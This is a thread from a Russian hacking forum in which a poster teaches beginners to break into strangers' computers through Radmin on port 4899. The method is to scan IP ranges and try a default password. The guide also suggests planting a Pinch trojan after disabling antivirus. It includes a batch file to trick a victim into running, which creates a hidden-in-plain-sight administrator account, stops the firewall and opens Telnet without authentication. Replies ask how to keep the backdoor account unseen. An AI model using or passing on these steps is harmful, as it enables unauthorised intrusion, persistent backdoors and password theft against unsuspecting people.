Реклама на hackersoft.ru Реклама на hackersoft.ru

Вернуться   Форумы Hackersoft > Хакерство и безопасность > Для новичков > Взлом компьютеров
CHAT Регистрация Справка Пользователи Доска почета Календарь Поиск Сообщения за день Все разделы прочитаны

Взлом компьютеров Проникновение на удаленные компьютеры и серверы. Получение доступа к чужой системе.

Ответ
 
Опции темы
Старый 09.11.2009, 17:50   #1
m33
professional 
 
Аватар для m33
 
Регистрация: 30.08.2008
Прописка: 127.0.0.1
Сообщений: 1,495
Вес репутации: 44 m33 профессионалm33 профессионалm33 профессионалm33 профессионалm33 профессионалm33 профессионалm33 профессионалm33 профессионалm33 профессионалm33 профессионал
Депозит: 0$
Вы сказали Спасибо: 109
Поблагодарили 609 раз(а) в 351 сообщениях
Приветствую всех на этом форуме!

Сейчас я покажу, как можно взломать компьютер через Radmin (4899 порт).

Нам понадобится 2 программы: Radmin Viewer и VNC_Scan. (можно юзать другой сканер портов, но я рекомендую этот т.к. скорость сканирования поражает.)

Для начала найдем компы с открытым 4899 портом, для этого открываем папку с нашим сканером, открываем с помощью блокнота файл go.bat и пишем туда диапазон сканируемых айпи адресов. Пример:

Цитата:
84.131.211.1-84.131.211.255
Сохраняем и открываем, видим следущее:



После сканирования программа закроется самостоятельно, в папке с прогой открываем файл VNC_bypauth, там будут айпи с открытым 4899 портом.

Открываем радмин, жмем на желтую молнию и вводим айпи.



Жмем "Ок", и вводим пароль 12345678. Почему именно такой пароль? Дело в том, что раньше радмин шел в сборках Zver CD, и те кто их ставил, получали включенный радмин, с паролем 12345678. Но учтите, что этот пароль не всегда подойдет.

Если пароль подойдет, видим что то вроде этого:



Ну теперь можем делать, что угодно: рыться в компе (жертва ничего не заметит), удалять файлы, посылать команды через telnet, выключить компьютер и т.д.

Если вам нужен только пароль, ждите пока жертва отойдет от компа (или не ждите) и кидайте троян сделанный в пинче (антивирусник отрубить не забывайте) и открывайте, можно конечно и с помощью MPR.

Если вы хотите зайти в комп к определенному челу, то тот все немного сложнее.

Для начала нам нужно написать батник и кинуть его жертве, чтобы он/она открыла его. Ах да, что такое батник и как его создать спросите вы.. Bat файлы - это обычные текстовые файлы, содержащие наборы команд интерпритатора и имеющие расширение bat. Для того чтобы создать такой файл, открываем блокнот, нажимаем "Сохранить как", выбираем "Все файлы" и пишем название файла, после которого нужно обязательно поставить .bat. Например: 123.bat.

В батник пишем следующее:

Код:
chcp 1251
net user root mypass /add
net localgroup Администраторы root /add
net localgroup Administrators root /add
net stop sharedaccess
sc config tlntsvr start= auto
tlntadmn config port=4899 sec=-NTLM
net start Telnet
И кидаем жертве, надо чтобы он/она открыла его. С помощью этого батника мы откроем 4899 порт и создадим учетную запись. (Надо)

Узнаем айпи того, к кому хотите проникнуть в комп, как узнать - выхоит за рамки этой статьи.

Дальше коннектимся, вводим логин - root, а пароль - mypass, ну собственно и все.

Удачного хека..

(C) m33.

Я няшка.

Последний раз редактировалось GrandMaster, 09.04.2010 в 18:56.
m33 вне форума   Ответить с цитированием
Старый 09.11.2009, 17:54   #2
GrandMaster
Супер-пупер 
 
Аватар для GrandMaster
 
Регистрация: 09.11.2008
Сообщений: 1,726
Вес репутации: 43 GrandMaster специалистGrandMaster специалистGrandMaster специалистGrandMaster специалистGrandMaster специалистGrandMaster специалистGrandMaster специалист
Депозит: 0$
Вы сказали Спасибо: 688
Поблагодарили 600 раз(а) в 359 сообщениях
Видео по теме : http://forum.hackersoft.ru/showthread.php?t=6037
GrandMaster вне форума   Ответить с цитированием
Старый 03.12.2009, 12:48   #3
NaVaS
user 
 
Аватар для NaVaS
 
Регистрация: 04.06.2009
Сообщений: 58
Вес репутации: 2 NaVaS новичек
Депозит: 0$
Вы сказали Спасибо: 3
Поблагодарили 1 раз в 1 сообщении
хи странно, этим батником с таким текстом нечего не открывает, как был так и есть закрытый порт!
NaVaS вне форума   Ответить с цитированием
Старый 03.12.2009, 13:00   #4
m33
professional 
 
Аватар для m33
 
Регистрация: 30.08.2008
Прописка: 127.0.0.1
Сообщений: 1,495
Вес репутации: 44 m33 профессионалm33 профессионалm33 профессионалm33 профессионалm33 профессионалm33 профессионалm33 профессионалm33 профессионалm33 профессионалm33 профессионал
Депозит: 0$
Вы сказали Спасибо: 109
Поблагодарили 609 раз(а) в 351 сообщениях
тут почитай

Я няшка.
m33 вне форума   Ответить с цитированием
Благодарности m33 от:
Старый 05.12.2009, 00:35   #5
STreem
adherent 
 
Аватар для STreem
 
Регистрация: 25.04.2009
Сообщений: 214
Вес репутации: 0 STreem нуб-мудак
Депозит: 0$
Вы сказали Спасибо: 85
Поблагодарили 12 раз(а) в 11 сообщениях
А можно как нибудь сделать чтобы пользователь не был виден в меню выбора пользователей. Ато от туда все сразу же палится и удаляется. В итоге времяни только до первой перезагрузки а эт фигово.
STreem вне форума   Ответить с цитированием
Старый 05.12.2009, 09:55   #6
m33
professional 
 
Аватар для m33
 
Регистрация: 30.08.2008
Прописка: 127.0.0.1
Сообщений: 1,495
Вес репутации: 44 m33 профессионалm33 профессионалm33 профессионалm33 профессионалm33 профессионалm33 профессионалm33 профессионалm33 профессионалm33 профессионалm33 профессионал
Депозит: 0$
Вы сказали Спасибо: 109
Поблагодарили 609 раз(а) в 351 сообщениях
нет, чтобы был не виден - нельзя

Я няшка.
m33 вне форума   Ответить с цитированием
Старый 06.12.2009, 01:43   #7
STreem
adherent 
 
Аватар для STreem
 
Регистрация: 25.04.2009
Сообщений: 214
Вес репутации: 0 STreem нуб-мудак
Депозит: 0$
Вы сказали Спасибо: 85
Поблагодарили 12 раз(а) в 11 сообщениях
А можно ли использовать стандартные встроенные в винду юзеры (например Администратор) которые невидимые просто добавив к ним пароль или у них нет должных прав?
STreem вне форума   Ответить с цитированием
Старый 06.12.2009, 07:22   #8
m33
professional 
 
Аватар для m33
 
Регистрация: 30.08.2008
Прописка: 127.0.0.1
Сообщений: 1,495
Вес репутации: 44 m33 профессионалm33 профессионалm33 профессионалm33 профессионалm33 профессионалm33 профессионалm33 профессионалm33 профессионалm33 профессионалm33 профессионал
Депозит: 0$
Вы сказали Спасибо: 109
Поблагодарили 609 раз(а) в 351 сообщениях
можно, если ты знаешь имя и пароль пользователя то нет смысла создавать нового

Я няшка.
m33 вне форума   Ответить с цитированием
Старый 06.12.2009, 17:57   #9
STreem
adherent 
 
Аватар для STreem
 
Регистрация: 25.04.2009
Сообщений: 214
Вес репутации: 0 STreem нуб-мудак
Депозит: 0$
Вы сказали Спасибо: 85
Поблагодарили 12 раз(а) в 11 сообщениях
Не. Я имею в виду что в любой винде есть пользователь админ обязательно просто он скрытый как и гость например. Можно ли не создавать нового пользователя а добавить этому скрытому админу пароль и заходить через него? И как я понимаю если пароля у юзера нет то ничего не выйдет?
STreem вне форума   Ответить с цитированием
Старый 06.12.2009, 17:59   #10
m33
professional 
 
Аватар для m33
 
Регистрация: 30.08.2008
Прописка: 127.0.0.1
Сообщений: 1,495
Вес репутации: 44 m33 профессионалm33 профессионалm33 профессионалm33 профессионалm33 профессионалm33 профессионалm33 профессионалm33 профессионалm33 профессионалm33 профессионал
Депозит: 0$
Вы сказали Спасибо: 109
Поблагодарили 609 раз(а) в 351 сообщениях
Цитата:
И как я понимаю если пароля у юзера нет то ничего не выйдет?
если пароля нет, то запрашивать пароль и логин не будет, а будет только пароль запрашивать дефолтный для радмина, а может и вообще не будет (такое бывало)

Я няшка.
m33 вне форума   Ответить с цитированием
Ответ


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 
Опции темы

Ваши права в разделе
Вы не можете создавать темы
Вы не можете отвечать на сообщения
Вы не можете прикреплять файлы
Вы не можете редактировать сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.


Часовой пояс GMT +4, время: 06:12.


© 2005 — +∞ Hackersoft. Все и вся защищены.
Публичная оферта | Правила форума | Реклама на сайте
Powered by vBulletin®©™ Jelsoft®©™ Enterprises Ltd. Перевод: zCarot.
Реклама на hackersoft.ru Реклама на hackersoft.ru